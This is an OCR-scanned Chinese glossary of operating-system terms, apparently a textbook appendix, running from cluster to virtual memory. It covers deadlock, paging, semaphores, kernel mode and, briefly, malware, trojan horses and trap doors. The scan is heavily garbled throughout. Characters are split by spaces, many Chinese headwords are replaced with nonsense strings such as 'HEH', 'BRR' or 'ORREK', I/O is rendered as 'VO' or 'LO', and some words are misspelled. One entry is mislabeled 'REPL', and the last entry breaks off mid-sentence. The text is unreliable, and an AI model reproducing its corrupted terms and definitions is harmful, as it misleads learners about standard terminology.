cluster (集群 ) 一 组 互联 的 整 机 , 它们 作为 一 个 统一 的 计算 资源 一 起 工作 , 就 像 一 台 机 器 一 样 。 
REPL ( whole computer ) 是 指 可 以 脱离 集群 独立 运行 的 系统 。 

communication architecture (通信 体系 结构 〉 ”实现 通信 功能 的 硬件 和 软件 结构 。 

compaction (压缩 ) 在 存储 器 被 划分 成 大 小 可 变 的 分 区 时 使 用 的 一 种 技术 。 操 作 系 统 不 时 地 
通过 移动 分 区 使 它们 连续 , 从 而 使 所 有 空闲 空间 都 在 一 个 块 中 。 参见 external fragmentation, 

concurrent 《并 发 ) ”在 同一 段 时 间 间 隔 中 运行 的 进程 或 线程 ， 在 此 期 间 ， 它们 可 能 必须 交替 地 
共享 相同 的 资源 。 

consumable resource 〈 可 消耗 资源 ) ”可 以 被 创建 ( 生产 ) 和 销毁 〈 消耗 ) 的 资源 。 当 一 个 进 
程 获得 一 个 资源 时 , 该 资源 就 不 再 存在 。 可 消费 资源 的 例子 有 中 断 、 信 和 号、 消息 和 VO 缓冲 
区 中 的 信息 。 


critical section ORREK) ”在 计算 机 程序 的 异步 过 程 中 ， 不 能 和 另 一 个 异步 过 程 相关 临界 区 同 
时 执行 的 部 分 。 参 见 mutual exclusion。 

database (SiH) ”大 量 的 相关 数据 集合 ， 通 常 有 元 余 控 制 ， 并 根据 某 种 方案 进行 组 织 ， 以 便 
为 一 个 或 多 个 应 用 程序 提供 服务 。 这 些 数据 被 存储 起 来 ， 这 样 ， 不 同 的 程序 可 以 使 用 这 些 数 
据 而 不 需要 关心 数据 的 结构 或 组 织 。 有 一 种 通用 方法 以 增加 新 数据 、 修 改 和 检索 已 存在 数据 。 

deadlock (HEH) 1) 多 个 进程 都 在 等 待 一 个 资源 可 用 , 但 是 由 于 这 个 资源 被 另 一 个 进程 持 有 ， 
并 且 该 进程 也 处 于 类 似 的 等 待 状态 ， 因 此 这 个 资源 永远 也 不 会 成 为 可 用 的 ,这 时 出 现 的 僵局 ; 
2) 当 多 个 进程 都 在 互相 等 待 对 方 的 行为 或 响应 时 出 现 的 从 局。 

deadlock avoidance (EHER) ”一 种 为 避免 死 锁 而 检查 每 一 个 新 的 资源 请 求 的 动态 技术 。 如 
果 新 的 请 求 会 导致 死 锁 ， 则 拒绝 请 求 。 

deadlock detection《〈 死 锁 检 测 ) ” 当 被 请 求 的 资源 可 用 时 ， 则 同意 请 求 。 操 作 系 统 会 周期 性 地 
检测 死 锁 。 

deadlock prevention (HMM) 一 种 保证 不 会 发 生死 锁 的 技术 。 死 锁 预 防 是 通过 确保 死 锁 
的 必要 条 件 之 一 不 被 满足 来 实现 的 。 

demand paging 请求 式 页 面 调度 ) 内 存在 需要 时 将 页 面 从 辅 存 传 输 到 内 存 。 与 预约 式 页 面 调 
KE (prepaging ) 对 应 。 

device driver 设备 驱动 ) ”直接 处 理 设备 或 IO 模块 的 操作 系统 模块 (通常 位 于 内 核 中 )。 

direct access (直接 存 取 ) 通过 指向 该 数据 的 物理 单元 的 地 址 ,按照 与 它们 的 相对 位 置 无 关 的 
顺序 ， 从 存储 设备 中 获取 数据 或 者 把 数据 送 到 存储 设备 中 的 能 力 。 

Direct Memory Access (DMA, H#AGGR) ”内存 的 一 种 1/O 模式 ,在 该 模式 下 ,一 个 称 做 
DMA 模块 的 特殊 模块 控制 内 存 与 VO 设备 之 间 的 数据 交换 。 处 理 器 向 DMA 模块 发 送 数据 
块 传输 请 求 ， 只 有 整个 数据 块 传输 完毕 才 被 中 断 。 

disabled interrupt (Stik PRT) ”通常 是 由 操作 系统 产生 的 一 种 状态 。 在 该 状态 下 ， 处 理 器 将 忽 
略 特定 类 型 的 中 断 请 求 信和 号。 

disk allocation table (磁盘 分 配 表 ) ”一 个 用 于 表示 辅 存 中 的 哪些 块 是 空闲 的 并 可 以 分 配给 文 
件 的 表 。 

disk cache〔〈 磁 盘 高 速 缓存 ) ”一 个 通常 保留 在 内 存 中 的 缓冲 区 ,充当 磁盘 高 速 缓存 和 其 余 内 存 
之 间 的 高 速 缓存 。 

dispatch (分 派 ) 给 准备 好 执行 的 工作 或 任务 分 配 处 理 器 时 间 。 

distributed operating system (分 布 式 操作 系统 ) ”网络 中 的 计算 机 共享 的 一 个 公共 操作 系统 。 
分 布 式 操 作 系统 为 进程 间 通 信 、 进 程 迁移 、 互 斥 以 及 死 锁 检测 和 预防 提供 支持 。 

dynamic relocation (动态 重 定位 ) ”一 个 进程 在 执行 期 间 给 计算 机 程序 指定 新 的 绝对 地 址 ， 使 
得 该 程序 可 以 从 内 存 中 的 不 同 区 域 执行 。 

enabled interrupt〈 人 允许 中 断 ) ”通常 由 操作 系统 产生 的 一 种 状态 ， 在 此 期 间 ， 处 理 器 将 响应 特 
定 类 型 的 中 断 请 求 信 和 号。 

encryption (ANH) ”通过 可 逆 的 数学 计算 ， 把 明文 或 数据 转换 成 难以 理解 的 格式 。 

execution context (执行 上 下 文 ) BW process state, 

external fragmentation 〈 外 部 碎片 ) “” 当 存储 器 根据 所 分 派 的 数据 块 的 大 小 而 划分 成 可 变 大 小 
的 分 区 (例如 内 存 中 的 段 ) 时 ， 就 会 产生 外 部 碎片 。 当 段 被 移 人 移出 存储 器 时 ， 存 储 器 中 被 
占据 的 部 分 之 间 会 出 现 间 隙 。 

field (i) 1 ) 作为 记录 的 一 部 分 的 已 定义 的 逻辑 数据 ; 2 ) 一 个 记录 的 基本 单元 ， 可 能 包含 一 
个 数据 项 、 一 个 数据 集合 、 一 个 指针 或 者 一 个 链接 . 
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file (文件 ) ”把 一 组 相关 记录 作为 一 个 单元 就 是 文件 。 

File Allocation Table (FAT， 文 件 分 配 表 ) ”一 个 用 于 指明 分 配给 一 个 文件 的 空间 在 辅 存 中 的 物 
理 位 置 的 表 。 每 个 文件 都 有 一 个 文件 分 配 表 。 

file management system (文件 管理 系统 ) ”给 使 用 文件 的 用 户 和 应 用 程序 提供 包括 文件 访问 、 
目录 维护 和 访问 控制 等 服务 的 一 组 系统 软件 。 

fie organization (文件 组 织 ) ”一 个 文件 中 记录 的 物理 顺序 ( 由 保存 和 获取 方法 确定 )。 

First Come First Served (FCFS， 先 来 先 服务 ) 同 First In First Out. 

First In First Out (FIFO, HH) ”一 种 队列 技术 ,使 得 下 一 个 被 取出 的 项 是 在 队列 中 时 间 
最 长 的 项 。 

frame (页 框 ) ”在 页 式 虚 拟 存储 中 ， 内 存 中 用 于 保存 虚 存 中 的 一 页 的 固定 长 度 的 块 。 

gang scheduling (组 调度 ) 一 组 相关 的 线程 基于 一 对 一 的 原则 ， 被 同时 调度 到 一 组 处 理 器 上 
运行 。 

hash fie (CHIX) ”可 以 根据 关键 字 域 的 值 访问 记录 的 一 种 文件 。 散 列 方法 用 于 基于 关键 字 
的 值 查找 记录 。 

hashing〈 散 列 法 ) ”在 为 一 项 数据 选择 存储 位 置 时 ， 将 地址 作为 数据 内 容 的 函数 来 计算 。 这 项 
技术 增加 了 存储 分 配 函 数 的 复杂 度 , 但 是 可 以 带 来 快速 的 随机 检索 。 

hit ratio (ARF) ”在 两 级 存储 结构 中 ， 所 有 内 存储 器 访 问 中 高 速 存 储 器 ( 如 高 速 缓存 ) 所 占 
的 比例 。 

indexed access (索引 存 取 ) 通过 一 个 关于 记录 位 置 的 独立 的 索引 , 组 织 和 访问 一 个 存储 结构 
中 的 记录 。 

indexed file〈 索 引文 件 ) ”可 以 根据 关键 字 域 的 值 访问 记录 的 一 种 文件 。 需 要 一 个 基于 关键 字 
值 的 索引 来 指明 每 个 记录 的 位 置 。 

indexed sequential access (索引 顺序 存 取 ) 通过 一 个 关键 字 的 索引 ， 组织 和 访问 一 个 存储 结 
构 中 的 记录 。 索 引 保存 在 任意 划分 的 顺序 文件 中 。 

indexed sequential file《〈 索 引 顺 序 文件 ) ”一 种 记录 按照 关键 字 域 的 值 进行 排 序 的 文件 。 有 一 
个 包含 部 分 关键 字 值 列 表 的 索引 文件 作为 主 文件 的 补充 。 索 引 提供 了 一 种 查找 能 力 , 能 够 快 
速 到 达 想 要 的 记录 附近 。 

instruction cycle 指令 周期 ) 当 计 算 机 执行 机 器 语言 指令 时 ， 从 内 存 中 读 取 并 执行 一 条 指令 
的 时 间 周 期 。 

internal fragmentation (HARRER) ” 当 存 储 器 被 划分 成 固定 大 小 的 分 区 ( 如 内 存 中 的 页 框 、 磁 
盘 中 的 物理 块 ) 时 ,会 产生 内 部 碎片 。 如 果 一 块 数据 被 分 派 到 一 个 或 多 个 分 区 ， 那 么 当 最 
后 一 部 分 数据 大 小 比 最 后 一 个 分 区 容量 小 时 ， 在 最 后 一 个 分 区 中 就 会 出 现 被 浪费 的 空间 。 

interrupt CRE) 一 个 进程 (如 一 个 计算 机 程序 的 执行 ) 被 挂 起 。 由 进程 外 部 的 一 个 事件 引发 
HK, 并且 按照 某 种 方式 执行 使 得 该 进程 可 以 被 恢复 。 

interrupt handler (中断 处 理 程序 ) ”通常 是 操作 系统 的 一 部 分 的 一 个 例 程 。 当 中 断 产生 时 ， 控 
制 权 移交 给 中 断 处 理 程序 ， 中 断 处 理 程序 根据 引发 中 断 的 条 件 进 行 处 理 。 

job GEL) 被 打包 并 作为 一 个 单元 运行 的 计算 步骤 (computational steps) HRA. 

Job Control Language 〈JCL， 作 业 控 制 语言 一 种 面向 问题 的 语言 ， 用 于 表达 作业 的 声明 ， 
这 些 声明 用 于 标识 该 作业 ， 或 向 操作 系统 描述 作业 的 要 求 。 

kernel (H) ”操作 系统 的 一 部 分 ， 包含 软件 最 重要 的 部 分 。 通 常 ， 内 核 永 久 驻 留 在 内 存 中 。 
内 核 运行 在 特权 模式 下 ， 并 响应 来 自 进程 的 调用 和 来 自 设备 的 中 断 。 
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kernel mode (AAS) ”操作 系统 内 核 所 保留 的 特权 执行 状态 。 内 核 态 允许 访问 低级 别 的 执行 
进程 不 能 访问 的 内 存 区 域 ; 也 允许 运行 只 能 在 内 核 态 下 执行 的 机 器 指令 。 内 核 态 也 称 做 系统 
态 或 特权 态 。 

Last In First Out (LIFO， 后 进 先 出 ) 下 一 次 被 取 到 的 项 是 最 新 放 和 人 队列 中 的 项 的 一 种 排队 技术 。 

lightweight process《〈 轻 量 级 进程 ) 线程 。 

livelock《〈 活 锁 ) 《这样 的 一 种 状况 : 两 个 或 多 个 进程 不 断 地 改变 它们 的 状态 ， 来 响应 别 的 进程 
的 变化 ,， 除 此 之 外 不 做 任何 有 用 的 工作 。 这 类 似 于 死 锁 中 谁 也 不 能 继续 进行 的 情况 , 但 不 同 
的 是 ， 没 有 任何 一 个 进程 被 阻塞 或 等 待 任何 事件 的 发 生 。 

locality of reference (访问 的 局 部 性 ) 处 理 器 在 很 短 的 时 间 内 重复 地 访问 同一 内 存 区 域 的 趋势 。 

logical address GZH) ”一 个 存储 位 置 的 引用 ， 这 个 位 置 和 分 配给 数据 的 实际 存储 空间 无 
关 。 在 实现 存储 器 访问 之 前 必须 转换 成 物理 地 址 。 

logical record GZR) 与 物理 环境 无 关 的 记录 。 一 个 逻辑 记录 的 各 个 部 分 可 能 在 不 同 的 
物理 记录 中 ; 多 个 逻辑 记录 或 部 分 逻辑 记录 可 能 对 应 同一 个 物理 记录 。 

macrokernel (HAH) ”可 以 提供 很 多 服务 的 大 操作 系统 内 核 。 

mailbox (邮箱) ”为 多 个 进程 间 所 共享 的 一 种 数据 结构 ， 邮 箱 被 当做 一 个 存放 消息 的 队列 ， 消 
息 不 是 直接 从 发 送 者 传递 给 接收 者 ， 而 是 先 发 送 到 邮箱 ， 再 从 邮箱 中 取出 。 

main memory (A) ”在 计算 机 内 部 的 存储 器 ， 是 程序 可 以 寻 址 的 ， 并 且 为 了 后 面 的 执行 或 
处 理 ， 可 以 载 人 到 寄存 器 中 。 

malicious software (BRR) ”被 设计 用 于 破坏 或 耗 尽 目标 计算 机 中 资源 的 软件 。 恶 意 软件 
通常 隐藏 在 合法 软件 中 或 者 伪装 成 合法 软件 。 在 某 些 情况 下 , 可 以 通过 电子 邮件 或 已 被 感染 
的 软盘 传播 到 别 的 计算 机 中 。 恶 意 软 件 的 类 型 包括 病毒 、 特 洛 伊 木 马 、 蠕 虫 和 用 于 拒绝 服务 
攻击 的 隐藏 软件 。 

memory cycle time《〈 内 存 周期 时 间 ) ”对 内 存 进行 读 或 写 一 个 字 操作 所 需 的 时 间 。 与 内 存 读 或 
写 一 个 字 的 速率 成 反比 。 

memory partitioning〈 存 储 分 区 ) ”把 一 个 存储 器 细 分 成 许多 独立 的 区 。 

message (HE) ”进程 之 间作 为 一 种 通信 方式 进行 交换 的 一 块 信息 。 

microkernel〈 微 内 核 ) ”一 个 很 小 的 具有 特权 的 操作 系统 核心 ， 其 提供 进程 调度 、 存 储 器 管理 
和 通信 服务 ， 而 一 些 传统 上 属于 操作 系统 内 核 的 功能 依靠 其 他 进程 执行 。 

mode switch《〈 状 态 转 换 ) ”一 种 导致 处 理 器 在 不 同 的 状态 ( 内 核 态 或 用 户 态 ) 下 执行 的 硬件 操 
作 。 当 从 用 户 态 切换 到 内 核 态 时 ， 需 要 保存 程序 计数 器 、 处 理 器 状态 字 和 其 他 寄存 器 。 当 从 
内 核 态 切换 到 用 户 态 时 ， 这 些 信息 将 被 恢复 。 

monitor EF) ”在 抽象 数据 类 型 内 封装 变量 、 访 问 过 程 和 初始 化 代码 的 程序 设计 语言 。 管 程 
的 变量 仅 可 通过 管 程 过 程 访问 , 并 且 一 次 仅 允许 一 个 处 于 运行 状态 的 进程 访问 管 程 。 管 程 的 
访问 过 程 是 临界 区 。 一 个 管 程 可 能 有 若干 进程 排队 等 待 访问 它 。 

monolithic kernel (单一 内 核 ) ”一 个 包含 了 整个 操作 系统 的 大 内 核 ， 包 括 调度 、 文 件 系统 、 设 
备 驱动 程序 和 内 存 管理 。 该 内核 的 所 有 功能 组 件 可 以 使 用 它 的 所 有 内 部 数据 结构 和 例 程 。 典 
型 地 ， 一 个 单一 内 核 被 作为 一 个 进程 实现 ， 它 的 所 有 元 素 共享 同一 个 地 址 空间 。 

multilevel security〈 多 级 安全 ) ”能 在 数据 的 多 级 划分 上 实现 访问 控制 的 能 力 。 

multiprocessing (Z kE) ”由 一 个 多 处 理 器 中 的 两 个 或 多 个 处 理 器 为 并 行 处 理 提供 的 一 种 操 
作 模 式 。 

multiprocessor〈 多 处 理 器 ) ”一 个 计算 机 有 两 个 或 多 个 处 理 嚣 ， 这 些 处 理 器 共享 以 相同 的 访问 
方式 访问 同一 个 内 存 。 
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multiprogramming 〈 多 道 程序 设计 ) 由 一 个 处 理 器 交错 执行 两 个 或 多 个 计算 机 程序 的 一 种 操 
作 模 式 。 与 另 一 个 术语 多 任务 相同 。 

multiprogramming level (多 道 程序 设计 道 数 ) 部 分 或 完全 驻 留 在 内 存 中 的 进程 数 。 

multitasking (多 任务 ) 为 实现 两 个 或 多 个 计算 机 任务 的 并 发 或 者 交错 执行 而 提供 的 一 种 操作 
模式 。 同 多 道 程序 设计 。 

mutex CERA) ”和 二 元 信号 量 类 似 。 它 们 之 间 最 主要 的 区 别 是 ， 对 互 斥 体 加 锁 (将 值 设 为 0) 
和 解锁 ( 将 值 设 为 1 ) 的 进程 必须 是 同一 个 。 相 反 ， 对 二 元 信号 量 加 锁 和 解锁 的 进程 可 能 不 
相同 。 

mutual exclusion (BFR) ”一 种 条 件 ， 规 定 在 任何 时 候 ， 一 组 进程 只 有 其 中 的 一 个 可 以 访问 某 
个 给 定 的 资源 或 执行 某 一 给 定 的 功能 。 参 见 critical Section。 

nonprivileged state 〈 非 特权 状态 ) ”一 种 执行 上 下 文 环境 ， 不 允许 敏感 的 硬件 指令 执行 ， 如 终 
止 指令 和 LO 指令 。 

nonuniform memory access multiprocessor 〈 非 一 致 存储 访问 多 处 理 器 ) . “种 共享 内 存 的 多 
处 理 器 ， 某 个 给 定 的 处 理 器 存 取 内 存 中 一 个 字 的 时 间 随 着 该 字 在 内 存 中 的 位 置 的 不 同 而 不 同 。 

object request broker (对 象 请 求 代理 ) ”面向 对 象 系统 中 的 一 个 实体 ， 作为 客户 向 服务 器 发 送 
请 求 的 一 个 中 介 。 

operating system GRIERA) ”一 种 控制 程序 执行 ， 并 提供 诸如 资源 分 配 、 调度 、 输 入 /输出 控 
制 和 数据 管理 之 类 的 服务 的 软件 。 

page (页 ) ”在 虚拟 存储 器 系统 中 ， 具有 一 个 虚拟 地 址 并 且 可 以 在 内 存 和 辅助 存储 器 之 间作 为 
一 个 单位 来 传送 的 一 种 长 度 固定 的 (数据 ) 块 。 

Page fault ( 缺 页 中 断 ) ” 当 包 含 被 访问 字 的 页 不 在 内 存 中 时 就 会 发 生 缺 页 。 这 会 引发 一 个 中 断 ， 
要 求 正确 的 页 被 取 人 内存。 

page frame (RHE) ”内 存 中 用 于 保存 一 个 页 的 固定 大 小 的 连续 块 。 

paging (REHE) ”页 在 内 存 和 辅 存 之 间 的 传送 。 

physical address 物理 地 址 ) ”一 个 数据 单元 在 存储 器 中 的 绝对 位 置 《如 内 存 中 的 字 或 字 节 、 
辅 存 中 的 块 )。 

pipe (管道) ”一 个 环形 缓冲 区 ， 允许 两 个 进程 按 生产 者 /消费 者 模型 进行 通信 。 因 此 ， 这 是 一 
个 先进 先 出 队列 ,由 一 个 进程 写 ， 另 一 个 进程 读 。 在 某 些 系统 中 ， 管道 被 推广 到 允许 选择 消 
费 队 列 中 的 任何 一 项 。 

preemption〈 抢 占 ) ”在 一 个 进程 还 没有 使 用 完 一 个 资源 时 收回 该 资源 。 

prepaging (MARNE) ” 读 和 人 的 页 不 是 一 次 缺 页 所 请 求 的 页 ， 希望 最 近 会 需要 用 到 这 些 
额外 读 人 的 页 ， 从 而 减少 磁盘 输入 /输出 。 可 与 demand paging 对 比 。 

priority inversion 〈 优 先 级 反 转 ) 操作 系统 强制 高 优先 级 的 任务 等 待 低 优先 级 任务 的 情况 。 

privileged instruction《 特 权 指 令 ) ”只 能 在 某 种 特定 的 模式 下 执行 ， 通常 是 由 管理 程序 使 用 
的 指令 。 

privileged mode《〈 特 权 态 ) ”参见 kernel mode, 

process《〈 进 程 ) ”一 个 程序 的 执行 。 进 程 是 由 操作 系统 控制 并 调度 的 。 与 task 相同 。 

process control block《〈 进 程控 制 块 ) 操作 系统 中 进程 信息 的 描述 。 进程 控制 块 是 一 个 数据 结 
构 ， 包 含 关 于 该 进程 的 特性 和 状态 等 信息 。 

Process descriptor (进程 描述 符 ) ”参见 process control block. 

Process image《〈 进 程 映像 ) 一 个 进程 的 所 有 组 成 部 分 ， 包含 程序 、 数 据 、 栈 和 进程 控制 块 。 
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process migration CER) ”为 了 支持 进程 在 日 标 机 上 运行 , 将 本 机 上 进程 足够 的 状态 迁移 
到 目标 机 。 

process spawning (进程 繁殖 )  ” 由 一 个 进程 创建 一 个 新 进程 。 

process state (进程 状态 ) ”操作 系统 管理 进程 所 需要 的 所 有 信息 ,以 及 处 理 器 正确 地 运行 该 进 
程 所 需要 的 所 有 信息 。 进 程 状态 包括 各 种 处 理 器 寄存 器 的 内 容 ， 如 程序 计数 器 和 数据 寄存 器 ; 
它 还 包括 用 于 操作 系统 的 信息 ， 如 进程 的 优先 级 和 进程 是 否 在 等 待 一 个 特殊 1/O 事件 的 完 
成 。 参 见 execution context, 

process switch《〈 进 程 切换 ) 处理 器 从 一 个 进程 切换 到 另 一 个 进程 的 操作 ， 包 括 为 第 一 个 进程 
保存 进程 控制 块 、 寄 存 器 和 其 他 信息 ， 并 把 它们 蔡 换 成 第 二 个 进程 的 信息 。 

processor (处 理 器 ) 计算 机 中 ,解释 和 执行 指令 的 功能 单元 。 一 个 处 理 器 至 少 包含 一 个 指 今 
控制 单元 和 一 个 算术 单元 。 

program counter (程序 计数 器 ) 指令 地 址 寄存 器 ， 

Program Status Word (PSW, 程序 状态 字 ) ”包含 状态 代码 、 执 行 模式 和 其 他 反映 进程 状态 的 
状态 信息 的 单个 寄存 器 或 寄存 器 组 o 

programmed WO《 可 编程 VO) CPU 向 IO 模块 发 出 IO 命令 ， 然 后 在 处 理 之 前 必须 等 待 操作 
完成 的 VO 形式。 

race condition〈 竞 争 条 件 》 有 多 个 进程 访问 和 操作 共享 数据 的 情况 ， 其 执行 结果 取决 于 这 些 
进程 的 相对 时 间 安 排 。 

real address〈 实 地 址 ) ”内存 中 的 物理 地 址 。 

real-time System (实时 系统 ) 能够 调度 并 管理 实时 任务 的 操作 系统 。 

real-time Task CEHZ) 执行 与 计算 机 系统 外 部 的 某 个 过 程 、 功 能 或 事件 集 有 关系 ,并且 
为 了 有 效 、 正 确 地 与 外 部 环境 交互 ， 必 须 满足 一 个 或 多 个 最 后 期 限 的 要 求 的 任务 。 

record 记录 ) ”作为 一 个 单元 处 理 的 一 组 数据 元 素 。 

reentrant procedure (可 重 入 过 程 ) ”一 个 允许 在 同一 个 例 程 的 前 一 次 执行 完成 之 前 进入 ,并且 
能 够 正确 执行 的 例 程 。 

registers ($F) CPU 内 部 的 高 速 存 储 器 。 一 些 寄存 器 是 用 户 可 见 的 ， 即 程序 员 通 过 机 器 
指令 集 可 以 访问 。 其 他 寄存 器 只 能 由 CPU 进行 控制 时 使 用 。 

relative address (相对 地 址 ) ”表示 与 基地 址 之 间 偏 移 的 地 址 。 

Remote Procedure Call (RPC， 远 程 过 程 调用 ) ” 能够 使 位 于 不 同 机 器 中 的 两 个 程序 可 以 使 用 
过 程 调用 /返回 的 语法 和 语义 进行 交互 的 一 种 技术 。 调 用 程序 和 被 调用 程序 表现 得 仿佛 运行 
在 同一 台 机 器 中 。 

rendezvous (会 合 ) ”在 消息 传递 中 ， 消 息 的 发 送 者 和 接收 者 都 被 阻塞 直到 该 消息 被 传递 的 情况 。 

resident Set (HI) ”任何 时 候 都 在 内 存 中 的 某 个 进程 的 一 部 分 。 相 对 于 working set. 

response time (了 响应 时 间 ) ”在 交互 终端 上 ， 一 个 数据 系统 中 从 发 送 完 一 个 询问 信息 到 开始 接 
收 到 一 个 响应 信息 之 间 所 经 历 的 时 间 。 

reusable resource (可 重用 资源 ) 一 次 只 能 供 一 个 进程 安全 地 使 用 ， 并且 不 会 由 于 使 用 而 耗 
尽 的 资源 。 进 程 得 到 资源 单元 , 后 来 又 释放 这 些 单元 , 供 其 他 进程 再 次 使 用 。 可 重用 资源 的 
例子 包括 处 理 器 、L/O 通道 、 内 存 和 辅 存 、 设 备 以 及 诸如 文件 、 数 据 库 和 信号 量 之 类 的 数据 
结构 。 

round robin (轮转 ) ”一 种 按 一 个 固定 的 循环 顺序 激活 进程 的 调度 算法 。 那 些 由 于 等 待 某 些 事 
件 ( 如 一 个 子 进程 或 一 个 输入 /输出 操作 的 结束 ) 而 不 能 继续 进行 的 进程 只 是 简单 地 把 控制 
返回 给 调度 程序 。 
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Scheduling (WAKE) 选 出 待 分 派 的 作业 或 任务 。 在 某 些 操作 系统 中 ， 其 他 作业 单位 ， 诸 如 输入 / 
输出 操作 ， 也 可 调度 。 

secondary memory《〈 辅 助 存储 器 》 位 于 计算 机 系统 之 外 的 存储 器 ;不 能 由 处 理 器 直接 处 理 ， 
它 里 面 的 数据 在 使 用 前 必须 先 复制 到 内 存 中 。 如 磁盘 和 磁带 。 

Segment (ER) 在 虚拟 存储 器 中 , 具有 虚拟 地 址 的 一 个 块 。 这 些 程序 块 的 长 度 可 以 是 不 相等 的 ， 
甚至 可 以 是 动态 变化 的 。 

Segmentation (JED ”把 一 个 程序 或 应 用 程序 划分 成 段 ， 分 段 是 虚拟 存储 器 方案 中 的 一 部 分 。 

semaphore (信和 号 量 ) 用 于 在 进程 间 发 信和 号 的 一 个 整数 值 。 对 一 个 信号 量 只 可 以 进行 三 种 操作 ， 
所 有 的 操作 都 是 原子 的 : 初始 化 、 减 量 和 增 量 。 根据 信号 量 的 精确 定义 , 减 量 操作 可 能 导致 
进程 的 阻塞 ， 增 量 操 作 可 能 导致 为 一 个 进程 解除 阻塞 。 

sequential access REFR) ”按照 数据 排序 后 的 顺序 ， 把 数据 送 入 一 个 存储 设备 或 数据 介 
质 中 ， 或 者 按照 数据 进入 的 顺序 获得 数据 的 能 力 。 

sequential file (顺序 文件 ) 记录 按照 一 个 或 多 个 关键 字 域 的 值 排 序 ， 并 且 从 文件 的 开始 处 按 
相同 的 顺序 被 处 理 的 文件 。 

Server〈 服 务 器 ) 1) 通过 消息 响应 客户 请 求 的 进程 ，2 ) 在 网 络 中 ,给 其 他 站 提供 功能 的 一 个 
数据 站 ， 如 文件 服务 器 、 打 印 服务 器 、 邮 件 服务 器 。 

session (if) . 表示 一 个 交互 式 用 户 应 用 程序 或 操作 系统 功能 的 一 个 或 多 个 进程 集合 。 所 有 
的 键盘 和 鼠标 输入 直接 定向 到 前 台 会 话 ， 所 有 前 台 会 话 的 结果 直接 输出 到 显示 屏 。 

Shell (命令 处 理 程序 ) ”操作 系统 的 一 部 分 ， 解释 交互 式 用 户 命 令 和 作业 控制 语言 中 的 命令 。 
用 来 充当 用 户 和 操作 系统 之 间 的 界面 。 

spin lock HRHD ”一 个 进程 在 一 个 无 限 循 环 中 执行 ， 等 待 锁 变 量 的 值 指明 锁 可 用 的 一 种 互 斥 
机 制 。 

spooling《〈 假 脱 机 技术 ) 当 在 外 围 设备 和 计算 机 处 理 器 之 间 传 送 数据 ， 为 了 减少 处 理 的 延 时 ， 
使 用 辅助 存储 器 作为 缓冲 存储 器 。 

stack (8) 一 个 有 序 表 ， 增加 或 删除 表 项 都 在 表 的 同一 端 进行 ， 称 做 栈 顶 。 也 就 是 说 ， 下 一 
个 放 到 表 中 的 元 素 位 于 栈 顶 ， 下 一 个 从 表 中 删除 的 项 在 表 中 的 时 间 最 短 ， 这 种 方法 称 做 后 
进 先 出 。 

starvation (饥饿 ) 一 个 进程 由 于 其 他 进程 总 是 优先 于 它 而 被 无 限 延迟 的 情况 。 

strong semaphore 〈 强 信号 量 ) ”一 种 信号 量 机 制 ， 所 有 在 同一 个 信号 量 上 等 待 的 进程 都 排队 
FR, 并且 最 终 按 它 们 执行 wait(p) 操 作 的 顺序 (FIFO 顺序 ) 继续 进行 。 

swapping 《交换 ) 内 存 将 其 中 一 个 区 域 的 内 容 与 辅助 存储 器 中 一 个 区 域 的 内 容 相互 交换 的 过 
程 或 处 理 方法 。 

Symmetric Multiprocessing (SMP， 对 称 多 处 理 ) 一 种 允许 操作 系统 在 任何 可 用 的 处 理 器 上 
执行 ,或 者 在 几 个 可 用 的 处 理 器 上 同时 执行 的 多 处 理 形式 。 

synchronous operation (同步 操作 》 相对 于 另 一 个 进程 中 某 一 特定 事件 的 发 生 ， 有 规律 地 或 
者 可 预测 地 发 生 的 一 种 操作 ， 例 如 ， 调用 一 个 输入 /输出 例 程 ， 在 一 个 计算 机 程序 中 预先 编 
码 的 位 置 接收 控制 。 

synchronization (同步) ”基于 某 一 条 件 ， 两 个 或 多 个 进程 协调 它们 的 活动 的 情形 。 

system bus (系统 总 线 ) ”用 来 和 主要 计算 机 组 件 ( CPU、 内 存 、VO ) 进行 内 部 连接 的 总 线 。 

system mode (系统 态 ) 参见 kernel mode, 

task (£) ”参见 process, 

thrashing (L31) ”在 虚拟 存储 机 制 中 ， 处 理 器 花费 大 量 的 时 间 用 于 交换 而 不 是 执行 指令 。 
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thread (线程 ) ”工作 分 配 单元 。 包 含 处 理 器 上 下 文 (包含 程序 计数 器 和 堆栈 指针 ) 和 自己 的 数 
据 栈 ( 使 子 程序 分 流 )。 线 程 顺序 执行 且 是 可 中 断 的 ， 处 理 器 从 而 转向 另 一 个 线程 。 一 个 进 
程 可 以 包括 多 个 线程 。 

thread switch《〈 线 程 切换 ) ”在 同一 个 进程 中 , 处 理 器 的 控制 从 一 个 线程 切换 到 另 一 个 线程 的 
动作 。 

time sharing (PAI) ”许多 用 户 并 发 地 使 用 一 个 设备 。 

time slice (RHA) = 在 中 断 前 一 个 进程 可 以 执行 的 最 大 时 间 数 量 。 

time slicing《〈 时 间 切 片 ) ”一 种 把 同一 处 理 机 上 的 时 间 量 分 配给 两 个 或 多 个 进程 的 操作 方式 。 

trace (ERIE) ” 当 一 个 进程 执行 时 ， 指 令 的 执行 序列 ， 

Translation Lookaside Buffer (TLB， 转 换 检测 缓冲 区 ) ”作为 分 页 式 虚 拟 存储 方案 的 一 部 分 ， 
用 于 保存 最 近 访 问 的 页 表 项 的 一 个 高 速 缓存 。TLB 减少 了 为 检索 页 表 项 而 访问 内 存 的 频率 。 

trap〈 陷 阱 ) ”转向 某 个 指定 地 址 的 非 编程 的 条 件 转移 ， 是 由 硬件 自动 激活 的 ; 跳 转 发 生 的 位 置 
会 被 记录 下 来 。 

trap door (REBIT) 隐秘 且 未 公开 地 进入 一 个 程序 的 人 口 点 ， 用 于 在 没有 正常 的 访问 授权 的 
情况 下 获准 访问 。 

trojan horse〔 特 洛 伊 木马 ) ”上 艇 人 到 一 个 有 用 的 程序 中 的 隐秘 且 未 公开 的 例 程 ， 执 行程 序 将 导 
致 这 个 秘密 例 程 的 执行 。 

trusted system (ARERR) ”一 个 实现 了 特定 的 安全 策略 且 能 够 验证 的 计算 机 和 操作 系统 略 。 

user mode (RPS) ”内 存 执 行 的 最 低 权限 状态 。 这 种 状态 下 将 不 能 使 用 内 存 中 的 某 些 寄 存 器 
和 某 些 机 器 指令 。 

Virus (病毒) ”散人 到 一 个 有 用 的 程序 中 的 隐秘 且 未 公开 的 例 程 ， 程 序 的 执行 将 导致 这 个 秘密 
例 程 的 执行 。 

virtual address (虚拟 地 址 ) ”虚拟 存储 器 中 存储 位 置 的 地 址 。 

virtual memory《〈 虚 拟 内 存 ) “计算 机 系统 的 用 户 可 将 其 看 做 是 可 寻 址 的 内 存储 器 的 一 种 存储 空 
